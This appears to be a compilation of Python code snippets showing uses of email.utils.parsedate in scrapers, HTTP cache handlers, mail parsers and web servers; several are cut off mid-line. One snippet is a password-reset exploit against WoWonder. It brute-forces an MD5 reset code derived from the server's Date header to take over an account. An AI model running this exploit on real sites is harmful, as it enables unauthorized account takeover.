def fetch_house_committee_meetings(committees, options): # Load any existing meetings file so we can recycle any GUIDs. existing_meetings = [] output_file = output_for("house") if os.path.exists(output_file): existing_meetings = json.load(open(output_file)) opts = dict(options) opts["binary"] = True opts["force"] = True meetings = [] seen_meetings = set() # Scrape the committee listing page for a list of committees with scrapable events. committee_html = utils.download( "http://docs.house.gov/Committee/Committees.aspx", "committee_schedule/house_overview.html", options) for cmte in re.findall(r'<option value="(....)">', committee_html): if cmte not in committees: logging.error("Invalid committee code: " + cmte) continue # Download the feed for this committee. logging.info("Fetching events for committee " + cmte) html = utils.download( "http://docs.house.gov/Committee/RSS.ashx?Code=%s" % cmte, "committee_schedule/house_%s.xml" % cmte, opts) # It's not really valid? html = html.replace( " ", " " ) # who likes nbsp's? convert to spaces. but otherwise, entity is not recognized. #print html # Parse and loop through the meetings listed in the committee feed. dom = lxml.etree.fromstring(html) # original start to loop for mtg in dom.xpath("channel/item"): eventurl = unicode(mtg.xpath("string(link)")) event_id = re.search(r"EventID=(\d+)$", eventurl) if not event_id: continue # weird empty event showed up event_id = event_id.group(1) pubDate = datetime.datetime.fromtimestamp( mktime(parsedate(mtg.xpath("string(pubDate)")))) # skip old records of meetings, some of which just give error pages if pubDate < (datetime.datetime.now() - datetime.timedelta(days=60)): continue # Events can appear in multiple committee feeds if it is a joint meeting. if event_id in seen_meetings: logging.info("Duplicated multi-committee event: " + event_id) continue seen_meetings.add(event_id) # this loads the xml from the page and sends the xml to parse_house_committee_meeting load_xml_from_page(eventurl, options, existing_meetings, committees, event_id, meetings) # if bad zipfile if load_xml_from_page == False: continue print "[house] Found %i meetings." % len(meetings) return meetings
def extract_date(email): date = email.get('Date') return parsedate(date)
def timestamp_from_http_modtime(str_modtime, str_format=format_epoch): t = datetime.datetime(*parsedate(str_modtime)[:6]) s = str(int((t - datetime.datetime(1970,1,1)).total_seconds())) t = datetime.datetime.fromtimestamp(time.mktime(t.timetuple())) f = str_format.replace(format_epoch, s) return t.strftime(f)
def filter_parsedate(val): """Attempts to parse a date according to the rules in RFC 2822""" return datetime.fromtimestamp(mktime(parsedate(val)))
import calendar, time import hashlib, re url = "http://*****:*****@securityforeveryone.com" } #change this email with your registered wowonder email address req = requests.post(url + "requests.php?f=recover", headers=myheaders, data=recoverdata) b = eut.parsedate(req.headers["Date"]) respepoch = calendar.timegm( time.strptime( "{0}-{1}-{2} {3}:{4}:{5}".format(b[0], b[1], b[2], b[3], b[4], b[5]), '%Y-%m-%d %H:%M:%S')) for token in range(111, 1000): str2hash = "{0}{1}".format(token, respepoch) email_code = hashlib.md5(str2hash.encode()).hexdigest() req_reset = requests.get( url + "index.php?link1=reset-password&code=1_{0}".format(email_code)) if len(re.findall("New password", req_reset.text)) == 1: print(email_code) resetdata = {"password": "******", "id": "1_" + email_code} reqtoken = requests.post(url + "requests.php?f=reset_password",
def parse_date(s): if s is None: return datetime.now() return datetime(*parsedate(s)[:6])
def parser(data): items = [] l = [] match = re.compile('<item>(.+?)</item>', re.DOTALL).findall(data) for item in match: thumb = '' plot = '' title = re.compile('<title>(.+?)</title>', re.DOTALL).findall(item)[0] pubDate = re.compile('<pubDate>(.+?)</pubDate>', re.DOTALL).findall(item)[0] description = re.compile('<description>(.+?)</description>', re.DOTALL).findall(item)[0] if '<category>' in item: category = cleanTitle( re.compile('<category>(.+?)</category>', re.DOTALL).findall(item)[-1]) else: category = '' if 'img src="' in description: thumb = re.compile('img src="(.+?)"', re.DOTALL).findall(description)[0] infos = re.compile('<p>(.*?)</p>', re.DOTALL).findall(description) if len(infos) >= 4: d = {} if infos[1] == '' or infos[1].endswith('...') and len( infos[1]) < len(title): plot = title + '\n\n' + infos[2] else: plot = infos[1].replace('\n', '') + '\n\n' + infos[2] link = re.compile('<link>(.+?)</link>', re.DOTALL).findall(item)[0] try: tmp = link.split('/')[4] tmp = tmp.lower() if 'Video-Podcast' in link or tmp.endswith( 'audio') or tmp.endswith('radio'): continue except: pass documentId = link.split('documentId=')[1] if '&' in documentId: documentId = documentId.split('&')[0] split = infos[2].split('|') runtime = 0 for part in split: if 'Min' in part or 'min' in part: runtime = runtimeToInt(part) if runtime: d['duration'] = str(runtime) channel = part[1:] # ugly if runtime > 0: bcastId = link.split('bcastId=')[1] if '&' in bcastId: bcastId = bcastId.split('&')[0] #fanart = bcast2thumb.getThumb(bcastId) # if fanart: # d['fanart'] = fanart # else: # print 'bcastid not in archive '+bcastId # print title d['_name'] = title d['url'] = link.replace('&', '&') #d["epoch"] = int(time.mktime(time.strptime(pubDate, '%D, %d %M %Y %H:%i:%s %O')))# d["_epoch"] = int(time.mktime(parsedate(pubDate))) d["documentId"] = d['url'].split("documentId=")[-1].split( "&")[0] d['_thumb'] = thumb d['_plot'] = plot d['_channel'] = channel d['_type'] = 'video' d['mode'] = 'libArdPlay' l.append(d) return l
def parse_date(str_date): return datetime(*(parsedate(str_date)[:6]))
access_secret, signature_type='query') stream = TwitterStream(auth=auth, secure=True) # iterate over tweets matching this filter text # IMPORTANT! this is not quite the same as a standard twitter search tweet_iter = stream.statuses.filter(track=search_term) pattern = re.compile("%s" % search_term, re.IGNORECASE) for tweet in tweet_iter: # check whether this is a valid tweet if tweet.get('text'): # turn the date string into a date object that python can handle timestamp = parsedate(tweet["created_at"]) # now format this nicely into HH:MM:SS format timetext = strftime("%H:%M:%S", timestamp) # colour our tweet's time, user and text time_colored = colored(timetext, color="white", attrs=["bold"]) user_colored = colored(tweet["user"]["screen_name"], "green") text_colored = tweet["text"] # replace each instance of our search terms with a highlighted version text_colored = pattern.sub(colored(search_term.upper(), "yellow"), text_colored) # add some indenting to each line and wrap the text nicely indent = " " * 11 text_colored = fill(text_colored, 80,
def rfc822_parsedate(v): from email.utils import parsedate return datetime.datetime.fromtimestamp(time.mktime(parsedate(v)))
def parseHttpTime(timeStr): return time.mktime(eut.parsedate(timeStr))
def timerfc2822(s): d = parsedate(s) return "{:04}-{:02}-{:02} {:02}:{:02}:{:02}".format(d[0],d[1],d[2],d[3],d[4],d[5])
def _fetch_archive(name, archive_type): """Fetches a blueprint archive from S3. Args: name (str): The name of the blueprint. archive_type (str): The type or the archive. Can be 'app' or 'kb'. Returns: str: The path of the local archive after it is downloaded. Raises: EnvironmentError: When AWS credentials are not available """ cache_dir = path.get_cached_blueprint_path(name) try: os.makedirs(cache_dir) except (OSError, IOError): # dir already exists -- no worries pass filename = { "app": BLUEPRINT_APP_ARCHIVE, "kb": BLUEPRINT_KB_ARCHIVE }.get(archive_type) local_archive = os.path.join(cache_dir, filename) remote_url = BLUEPRINT_URL.format(mindmeld_url=BLUEPRINTS_URL, blueprint=name, filename=filename) res = requests.head(remote_url) if res.status_code == 401: # authentication error msg = ( "Invalid MindMeld credentials. Cannot download blueprint. Please confirm " "they are correct and try again.") logger.error(msg) raise EnvironmentError(msg) if res.status_code != 200: # Unknown error msg = "Unknown error fetching {} archive from {!r}".format( archive_type, remote_url) logger.warning(msg) raise ValueError("Unknown error fetching archive") remote_modified = datetime.datetime(*parsedate( res.headers.get("last-modified"))[:6], tzinfo=tz.tzutc()) try: local_modified = datetime.datetime.fromtimestamp( os.path.getmtime(local_archive), tz.tzlocal()) except (OSError, IOError): # File doesn't exist, use minimum possible time local_modified = datetime.datetime(datetime.MINYEAR, 1, 1, tzinfo=tz.tzutc()) if remote_modified < local_modified: logger.info("Using cached %r %s archive", name, archive_type) else: logger.info("Fetching %s archive from %r", archive_type, remote_url) res = requests.get(remote_url, stream=True) if res.status_code == 200: with open(local_archive, "wb") as file_pointer: res.raw.decode_content = True shutil.copyfileobj(res.raw, file_pointer) return local_archive
def parse_datetime(string): if settings.USE_TZ: return datetime(*(parsedate(string)[:6]), tzinfo=current_timezone) else: return datetime(*(parsedate(string)[:6]))
def file_not_modified(self, static_file, environ): try: last_requested = environ['HTTP_IF_MODIFIED_SINCE'] except KeyError: return False return parsedate(last_requested) >= static_file.last_modified
async def handle_request(request, exception): start_time = time.time() format = 'html' url = request.path headers = dict() if url.startswith('/http'): url = url[1:] elif url.startswith('/html/http'): url = url[6:] elif url.startswith('/mhtml/http'): format = 'mhtml' url = url[7:] elif url.startswith('/pdf/http'): format = 'pdf' url = url[5:] elif url.startswith('/jpeg/http'): format = 'jpeg' url = url[6:] elif url.startswith('/png/http'): format = 'png' url = url[5:] if request.query_string: url = url + '?' + request.query_string parsed_url = urlparse(url) if not parsed_url.hostname: return response.text('Bad Request', status=400) if ALLOWED_DOMAINS: if parsed_url.hostname not in ALLOWED_DOMAINS: return response.text('Forbiden', status=403) skip_cache = request.method == 'POST' if not skip_cache: try: data = await cache.get(url, format) modified_since = await cache.modified_since(url) or time.time() headers['Last-Modified'] = formatdate(modified_since, usegmt=True) try: if_modified_since = parsedate( request.headers.get('If-Modified-Since')) if_modified_since = time.mktime(if_modified_since) except TypeError: if_modified_since = 0 if modified_since and if_modified_since >= modified_since: logger.info('Got 304 for %s in cache in %dms', url, int((time.time() - start_time) * 1000)) return response.text('', status=304, headers=headers) if data is not None: headers['X-Prerender-Cache'] = 'hit' logger.info('Got 200 for %s in cache in %dms', url, int((time.time() - start_time) * 1000)) if format == 'html': return response.html(apply_filters(data.decode('utf-8'), HTML_FILTERS), headers=headers) return response.raw(data, headers=headers) except Exception: logger.exception('Error reading cache') if sentry: sentry.captureException() if CONCURRENCY <= 0: # Read from cache only logger.warning('Got 502 for %s in %dms, prerender unavailable', url, int((time.time() - start_time) * 1000)) return response.text('Bad Gateway', status=502) try: if _ENABLE_CB: user_agent = request.headers.get('user-agent', '') _os, browser = httpagentparser.simple_detect(user_agent) breaker = _BREAKERS[browser] data, status_code = await breaker.run( lambda: _render(request.app.prerender, url, format)) else: data, status_code = await _render(request.app.prerender, url, format) headers.update({ 'X-Prerender-Cache': 'miss', 'Last-Modified': formatdate(usegmt=True) }) logger.info('Got %d for %s in %dms', status_code, url, int((time.time() - start_time) * 1000)) if format == 'html': if 200 <= status_code < 300: executor.submit(_save_to_cache, url, data.encode('utf-8'), format) return response.html(apply_filters(data, HTML_FILTERS), headers=headers, status=status_code) if 200 <= status_code < 300: executor.submit(_save_to_cache, url, data, format) return response.raw(data, headers=headers, status=status_code) except (asyncio.TimeoutError, asyncio.CancelledError, TemporaryBrowserFailure, RetriesExhausted): logger.warning('Got 504 for %s in %dms', url, int((time.time() - start_time) * 1000)) return response.text('Gateway timeout', status=504) except TooManyResponseError: logger.warning('Too many response error for %s in %dms', url, int((time.time() - start_time) * 1000)) return response.text('Service unavailable', status=503) except CircuitOpen: logger.warning('Circuit breaker open for %s', browser) return response.text('Service unavailable', status=503) except Exception: logger.exception('Internal Server Error for %s in %dms', url, int((time.time() - start_time) * 1000)) if sentry: sentry.captureException() return response.text('Internal Server Error', status=500)
t = Path(tmpdir / "KFMon") t.mkdir(parents=True, exist_ok=True) # Start with Plato print("\n* Creating a one-click package for Plato . . .") # It'll be staged in its own directory pl = Path(t / "Plato") # Download both packages... print("* Downloading original package") pl_main = Path(t / "Plato.zip") with requests.get(plato_main_url, stream=True) as r: if r.status_code != 200: raise SystemExit("Couldn't download the latest Plato release!") # We'll restore its mtime later... plato_date = mktime(parsedate(r.headers["Last-Modified"])) clen = int(r.headers.get("Content-Length", 0)) wrote = 0 with pl_main.open(mode="w+b") as f: with tqdm(total=clen, unit='B', unit_scale=True, unit_divisor=1024) as pbar: for data in r.iter_content(chunk_size=DEFAULT_BUFFER_SIZE): written = f.write(data) wrote += written pbar.update(written) if clen != 0 and wrote != clen: raise SystemExit( "Wrote {} bytes to disk instead of the {} expected!".format( wrote, clen)) pl_scripts = Path(t / "Plato-Scripts.zip") with requests.get(plato_scripts_url, stream=True) as r:
def parse_mailbox(mailbox_path, my_name, my_email, timestamp_format, use_mbox): if not use_mbox: mailbox_path = os.path.join(mailbox_path, "") if not os.path.isdir(mailbox_path + 'new'): os.mkdir(mailbox_path + 'new') if not os.path.isdir(mailbox_path + 'tmp'): os.mkdir(mailbox_path + 'tmp') if use_mbox: mbox = mailbox.mbox(mailbox_path) else: mbox = mailbox.Maildir(mailbox_path, None) sorted_mails = sorted(mbox, key=extract_date_mbox) # Sometimes thunderbird will produce mbox files with duplicate messages. # Keep track of all seen Message-ID's to prevent writing out duplicate # lines to the logs. seen_ids = set() for message in sorted_mails: messageobj = [] # Very rarely (happened to me with only 1 message out of 25,000), # Thunderbird/GMail will produce a malformed message with a payload, # but no metadata. Just skip these, but print a warning so the user # can ensure that this is not happening too often. if len(message.keys()) == 0: print("Warning: Skipping malformed message") continue # Skip duplicates if message['Message-ID'] in seen_ids: continue seen_ids.add(message['Message-ID']) name = re.sub("Chat with ", "", message['subject']) payload = message.get_payload() if type(payload) is str: # We're in one of the new hybrid-style single-use messages # Some (but not all) of these messages use quoted-printable # encoding (which uses = as an escape character). # The remainder are encoded with 7bit ASCII, which must not # be decoded, because treating = as an escape causes havoc. if message['Content-Transfer-Encoding'] == 'quoted-printable': payload = quopri.decodestring(payload) payload = payload.decode('utf-8') payload = payload.strip() to_name = re.sub(" <[^>]*>", "", message.get('To')) from_name = re.sub(" <[^>]*>", "", message.get('From')) if not name: name = to_name if to_name != my_name else from_name rawtimestr = message.get('Date') timestamp = time.strftime(timestamp_format, parsedate(rawtimestr)) pars = HTMLParser.HTMLParser() outline = "%s <%s> %s\n" % (timestamp, from_name, pars.unescape(payload)) messageobj.append(outline.encode('utf-8')) else: #We're in an old Google Talk Jabber conversation message payload = payload[0].as_string() # Seemingly all of these messages use quoted-printable encoding, # even though 'Content-Transfer-Encoding' is never set. payload = quopri.decodestring(payload) payload = payload.decode('utf-8') # The emails have a couple of chaff lines before the XML starts payload = re.sub(r'^[^<]*<', "<", payload) chatxml = xml.dom.minidom.parseString(payload.encode('utf-8')) for messagexml in chatxml.getElementsByTagName("cli:message"): speaker = messagexml.getAttribute("from") rawtimestr = messagexml.getElementsByTagName( "time")[0].getAttribute("ms") timefloat = float(rawtimestr[:-3] + "." + rawtimestr[-3:]) timestamp = time.strftime(timestamp_format, time.localtime(timefloat)) try: content = messagexml.getElementsByTagName( "cli:body")[0].firstChild.data except AttributeError: # No 'data' element means that it's an empty message content = "" except IndexError: # No "cli:body" elements means that it's a non-message event, # like a time-gap or user-unavailable message continue outline = "%s <%s> %s\n" % (timestamp, speaker, content) messageobj.append(outline.encode('utf-8')) write_to_file("%s.txt" % filename_sanitize(name)[:250], messageobj)
def run(environ, start_response): # start_response('404 Not Found', [('Content-Type', 'text/html; charset=UTF-8')]) # return [str(environ)] path = environ['PATH_INFO'][1:].split('/') use_gzip = False try: if 'gzip' in environ['HTTP_ACCEPT_ENCODING'].split(','): use_gzip = True except KeyError: pass path0 = path[0] if path0 == '' and environ['PATH_INFO'][0] == '/': path0 = 'index.html' if path0 in arquivos: arquivo = arquivos[path0] if not 'uncompressed_length' in arquivo: fname = path0 fp = open(fname, 'rb') arquivo['uncompressed_data'] = fp.read() fp.close() arquivo['uncompressed_length'] = str(os.path.getsize(fname)) arquivo['last_modified_time'] = os.path.getmtime(fname) arquivo['last_modified_str'] = formatdate( arquivo['last_modified_time'], False, True) try: since_time = calendar.timegm( parsedate(environ['HTTP_IF_MODIFIED_SINCE'])) if arquivo['last_modified_time'] <= since_time: start_response('304 Not Modified', []) return [''] except KeyError: pass content_length = arquivo['uncompressed_length'] content = arquivo['uncompressed_data'] content_encoding = None if use_gzip: if not 'compressed_length' in arquivo: fname = path0 + '.gz' fp = open(fname, 'rb') arquivo['compressed_data'] = fp.read() fp.close() arquivo['compressed_length'] = str(os.path.getsize(fname)) content_length = arquivo['compressed_length'] content = arquivo['compressed_data'] content_encoding = 'gzip' headers = [ ('Content-Type', arquivo['content_type']), # ('Expires', '-1'), ('Last-Modified', arquivo['last_modified_str']), ('X-Uncompressed-Content-Length', arquivo['uncompressed_length']), ('Content-Length', content_length), ] if content_encoding is not None: headers.append(('Content-Encoding', content_encoding)) start_response('200 OK', headers) return [content] elif path0 == 'load2.cgi': fname = encoded_fname(environ) data = None headers = [('Content-Type', 'application/json'), ('Expires', '-1')] try: # os arquivos estão em gzip. se gzip for pedido, o arquivo é # aberto normalmente e não é decodificado if use_gzip: fp = open(dados_prefix + fname + '.gz', 'rb') headers.append(('Content-Encoding', 'gzip')) else: fp = gzip.open(dados_prefix + fname + '.gz', 'rb') data = fp.read() fp.close() except IOError: pass if data is None: data = '' start_response('200 OK', headers) return [data] elif path0 == 'save2.cgi': fname = encoded_fname(environ) data = environ['wsgi.input'].read() fp = gzip.open(dados_prefix + fname + '.gz', 'wb') fp.write(data) fp.close() start_response('200 OK', [('Content-Type', 'text/html'), ('Expires', '-1')]) return ['OK'] elif path0 == 'ping.cgi': content_disposition = 'attachment; filename=' + get_q( environ['QUERY_STRING']) wsgi_input = environ['wsgi.input'].read().split('\r\n') terminator = wsgi_input[0] + '--' data = [] started = False for line in wsgi_input[1:]: if line == terminator: break if started: data.append(line) if line == '': started = True data = '\r\n'.join(data) start_response('200 OK', [('Content-Type', 'application/octet-stream'), ('Content-Disposition', content_disposition), ('Expires', '-1')]) return [data] elif path0 == 'robots.txt': start_response('200 OK', [('Content-Type', 'text/plain')]) data = "User-agent: *\nDisallow: /\n" return [data] raise IOError
def get_time_remaining(self, request): """See if a request is static and how long it can be cached for""" from email.utils import parsedate re_max_age = re.compile(r'max-age[ ]*=[ ]*(?P<maxage>[\d]+)') is_static = False time_remaining = -1 try: if 'response_headers' in request: content_length = self.get_header_value( request['response_headers'], 'Content-Length') if content_length is not None: content_length = int( re.search(r'\d+', str(content_length)).group()) if content_length == 0: return is_static, time_remaining if 'response_headers' in request: content_type = self.get_header_value( request['response_headers'], 'Content-Type') if content_type is None or \ (content_type.find('/html') == -1 and \ content_type.find('/cache-manifest') == -1): is_static = True cache = self.get_header_value( request['response_headers'], 'Cache-Control') pragma = self.get_header_value( request['response_headers'], 'Pragma') expires = self.get_header_value( request['response_headers'], 'Expires') if cache is not None: cache = cache.lower() if cache.find('no-store') > -1 or cache.find( 'no-cache') > -1: is_static = False if is_static and pragma is not None: pragma = pragma.lower() if pragma.find('no-cache') > -1: is_static = False if is_static: time_remaining = 0 if cache is not None: matches = re.search(re_max_age, cache) if matches: time_remaining = int( matches.groupdict().get('maxage')) age = self.get_header_value( request['response_headers'], 'Age') if time_remaining == 0: is_static = False time_remaining = -1 elif age is not None: time_remaining -= int( re.search( r'\d+', str(age).strip()).group()) elif expires is not None: date = self.get_header_value( request['response_headers'], 'Date') exp = time.mktime(parsedate(expires)) if date is not None: now = time.mktime(parsedate(date)) else: now = time.time() time_remaining = int(exp - now) if time_remaining < 0: is_static = False except Exception: pass return is_static, time_remaining
def http_date_to_datetime(string): """ >>> http_date_to_datetime('Thu, 26 Dec 2013 09:50:10 GMT') datetime.datetime(2013, 12, 26, 9, 50, 10) """ return datetime.datetime(*parsedate(string)[:6])
def inbound(request): """Try to serve a 304 for resources under assets/. """ uri = request.line.uri if not uri.startswith('/assets/'): # Only apply to the assets/ directory. return request if version_is_dash(request): # Special-case a version of '-' to never 304/404 here. return request if not version_is_available(request): # Don't serve one version of a file as if it were another. raise Response(404) ims = request.headers.get('If-Modified-Since') if not ims: # This client doesn't care about when the file was modified. return request if request.fs.endswith('.spt'): # This is a requests for a dynamic resource. Perhaps in the future # we'll delegate to such resources to compute a sensible Last-Modified # or E-Tag, but for now we punt. This is okay, because we expect to # put our dynamic assets behind a CDN in production. return request try: ims = timegm(parsedate(ims)) except: # Malformed If-Modified-Since header. Proceed with the request. return request last_modified = get_last_modified(request.fs) if ims < last_modified: # The file has been modified since. Serve the whole thing. return request # Huzzah! # ======= # We can serve a 304! :D response = Response(304) response.headers['Last-Modified'] = format_date_time(last_modified) response.headers['Cache-Control'] = 'no-cache' raise response
def parse_datetime(string): return datetime(*(parsedate(string)[:6]))
def add_last_modified_headers(self, static_file, url): mtime = os.stat(static_file.path).st_mtime last_modified = formatdate(mtime, usegmt=True) static_file.last_modified = last_modified static_file.last_modified_parsed = parsedate(last_modified) static_file.headers['Last-Modified'] = last_modified
def get_date(msg): if msg != None: email_date = parsedate(msg.get('date')) return time.strptime( '%s-%s-%s' % (email_date[0], email_date[1], email_date[2]), '%Y-%m-%d')
def get(self, urlpart): download = self.request.get('download', None) is not None # Redirect to usage page for visits from links (obviously not a browser PAC fetcher) if MAIN_SERVER and not download and 'Referer' in self.request.headers: self.redirect("/usage?u=" + urlpart, permanent=False) return if not self.parseRequest(urlpart): self.error(404) return rules = RuleList.getList('gfwlist') if rules is None: self.error(500) return pacTime = formatdate( timegm( max(self.settingTime, datetime(*parsedate(rules.date)[:6])).timetuple()), False, True) self.response.headers['ETag'] = '"' + pacTime.replace(',', '').replace( ' ', '') + '"' self.lastModified(pacTime) # Load balance if MAIN_SERVER and len( self.customRules) <= MAX_CUSTOM_RULE_NUMBER_FOR_MIRROR: mirror = self.pickMirror() if mirror: query = ['e=' + urlsafe_b64encode(r) for r in self.customRules] if download: query.append('download') mirror = '%s/%s?%s' % (mirror, self.proxyDict['urlpart'], '&'.join(query)) logging.debug('Redirect the PAC fetcher to %s', mirror) if not DEBUG: # A fixed server for a rate-limiting cycle self.response.headers[ 'Cache-Control'] = 'public,max-age=%d' % ( RATELIMIT_DURATION * 3600) self.redirect(mirror, permanent=False) return if RATELIMIT_ENABLED and self.isRateLimited(): return customJs = autoproxy2pac.rule2js('\n'.join([''] + self.customRules)) if self.proxyDict['name'] == 'privoxy': customJs = privoxyConfCode + customJs configs = { 'proxyString': self.proxyString, 'defaultString': 'DIRECT', 'customCodePre': customJs, } pac = autoproxy2pac.generatePac(rules.toDict(), configs, autoproxy2pac.defaultPacTemplate) import base64 pac = '''function decode64(_1){var _2="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var _3="";var _4,_5,_6;var _7,_8,_9,_a;var i=0;_1=_1.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{_7=_2.indexOf(_1.charAt(i++));_8=_2.indexOf(_1.charAt(i++));_9=_2.indexOf(_1.charAt(i++));_a=_2.indexOf(_1.charAt(i++));_4=(_7<<2)|(_8>>4);_5=((_8&15)<<4)|(_9>>2);_6=((_9&3)<<6)|_a;_3=_3+String.fromCharCode(_4);if(_9!=64){_3=_3+String.fromCharCode(_5);}if(_a!=64){_3=_3+String.fromCharCode(_6);}}while(i<_1.length);return _3;}eval(decode64("%s"))''' % base64.b64encode( pac) self.response.headers[ 'Content-Type'] = 'application/x-ns-proxy-autoconfig' if download: self.response.headers[ 'Content-Disposition'] = 'attachment; filename="autoproxy.pac"' self.response.out.write(pac)
def _parse_date(str): if str is None: return datetime.new() return datetime(*parsedate(str)[:6])
def main(): fp = open("/tmp/mail.log", "a") #fp.write("The file is " + sys.argv[1] + "\n") try: with open(sys.argv[1], 'rU') as email_fp: msg = email.message_from_file(email_fp) except Exception as errMess: fp.write("Failed to read e-mail message: " + str(errMess) + "\n") sys.exit("Failed to read e-mail message") raw_date = msg.get('Date', msg.get('Resent-Date', None)) addr_return_path = msg.get('Return-path', None) addr_reply_to = msg.get('Reply-to', None) addr_to = msg.get('Envelope-to', None) addr_from = msg.get('From', msg.get('Sender', None)) subject = msg.get('Subject', None) fp.write("Message to " + str(addr_to) + "\n") #fp.write("From was " + str(addr_from) + "\n") #fp.write("Subject was " + str(subject) + "\n") to_recipients = list() for recipient in getaddresses(msg.get_all('to', []) + msg.get_all('resent-to', [])): to_recipients.append(dict(name=recipient[0], address=recipient[1])) cc_recipients = list() for recipient in getaddresses(msg.get_all('cc', []) + msg.get_all('resent-cc', [])): cc_recipients.append(dict(name=recipient[0], address=recipient[1])) recipients = list() for recipient in getaddresses(msg.get_all('to', []) + msg.get_all('cc', []) + msg.get_all('resent-to', []) + msg.get_all('resent-cc', [])): recipients.append(dict(name=recipient[0], address=recipient[1])) if addr_to is None and len(recipients): addr_to = recipients[0]['address'] #fp.write("recipients are " + str(recipients) + "\n") if addr_to is not None: #fp.write("parsed envelope-to: " + str(parseaddr(addr_to)) + "\n") short_code = re.sub(r'@.*', '', parseaddr(addr_to)[1]) else: short_code = None #fp.write("short code is " + str(short_code) + "\n") record = db.session.query(Shortener).filter_by(short=short_code).first() if record is None: fp.write("short code not found\n") sys.exit("short code not found") #fp.write("short code found\n") #file_number = get_new_file_number(record.uid, 'email', yaml_file_name=record.filename) ##fp.write("file number is " + str(file_number) + "\n") #saved_file_email = SavedFile(file_number, fix=True) if addr_from is not None: #fp.write("parsed from: " + str(parseaddr(addr_from)[1]) + "\n") addr_from = dict(name=parseaddr(addr_from)[0], address=parseaddr(addr_from)[1]) else: addr_from = dict(empty=True) if addr_return_path is not None: #fp.write("parsed return_path: " + str(parseaddr(addr_return_path)[1]) + "\n") addr_return_path = dict(name=parseaddr(addr_return_path)[0], address=parseaddr(addr_return_path)[1]) else: addr_return_path = dict(empty=True) #fp.write("return_path is " + str(addr_return_path) + "\n") if addr_reply_to is not None: #fp.write("parsed reply-to: " + str(parseaddr(addr_reply_to)[1]) + "\n") addr_reply_to = dict(name=parseaddr(addr_reply_to)[0], address=parseaddr(addr_reply_to)[1]) #fp.write("reply-to is " + str(addr_reply_to) + "\n") else: addr_reply_to = dict(empty=True) #fp.write("reply-to is " + str(addr_reply_to) + "\n") msg_current_time = datetime.datetime.now() if raw_date is not None: msg_date = datetime.datetime.fromtimestamp(mktime(parsedate(raw_date))) #fp.write("msg_date is " + str(msg_date) + "\n") else: msg_date = msg_current_time #fp.write("msg_date set to current time\n") headers = list() for item in msg.items(): headers.append([item[0], item[1]]) #fp.write("headers:\n" + json.dumps(headers) + "\n") email_record = Email(short=short_code, to_addr=json.dumps(to_recipients), cc_addr=json.dumps(cc_recipients), from_addr=json.dumps(addr_from), reply_to_addr=json.dumps(addr_reply_to), return_path_addr=json.dumps(addr_return_path), subject=subject, datetime_message=msg_date, datetime_received=msg_current_time) db.session.add(email_record) db.session.commit() save_attachment(record.uid, record.filename, 'headers.json', email_record.id, 0, 'application/json', 'json', json.dumps(headers)) counter = 1 for part in msg.walk(): if part.get_content_maintype() == 'multipart': continue filename = part.get_filename() if part.get_content_type() == 'text/plain': ext = '.txt' else: ext = mimetypes.guess_extension(part.get_content_type()) if not ext: ext = '.bin' if filename: filename = '%03d-%s' % (counter, secure_filename(filename)) else: filename = '%03d-attachment%s' % (counter, ext) #fp.write("Filename is " + str(filename) + "\n") #fp.write("Content type is " + str(part.get_content_type()) + "\n") real_filename = re.sub(r'[0-9][0-9][0-9]-', r'', filename) real_ext = re.sub(r'^\.', r'', ext) save_attachment(record.uid, record.filename, real_filename, email_record.id, counter, part.get_content_type(), real_ext, part.get_payload(decode=True)) counter += 1 fp.close() user = None if record.user_id is not None: user = db.session.query(UserModel).filter_by(id=record.user_id).first() if user is None: user_info = dict(email=None, the_user_id='t' + str(record.temp_user_id), theid=record.temp_user_id, roles=list()) else: user_info = dict(email=user.email, roles=[role.name for role in user.roles], the_user_id=user.id, theid=user.id, firstname=user.first_name, lastname=user.last_name, nickname=user.nickname, country=user.country, subdivisionfirst=user.subdivisionfirst, subdivisionsecond=user.subdivisionsecond, subdivisionthird=user.subdivisionthird, organization=user.organization) result = docassemble.webapp.worker.background_action.delay(record.filename, user_info, record.uid, None, 'http://localhost', 'http://localhost', dict(action='incoming_email', arguments=dict(id=email_record.id)), extra=None)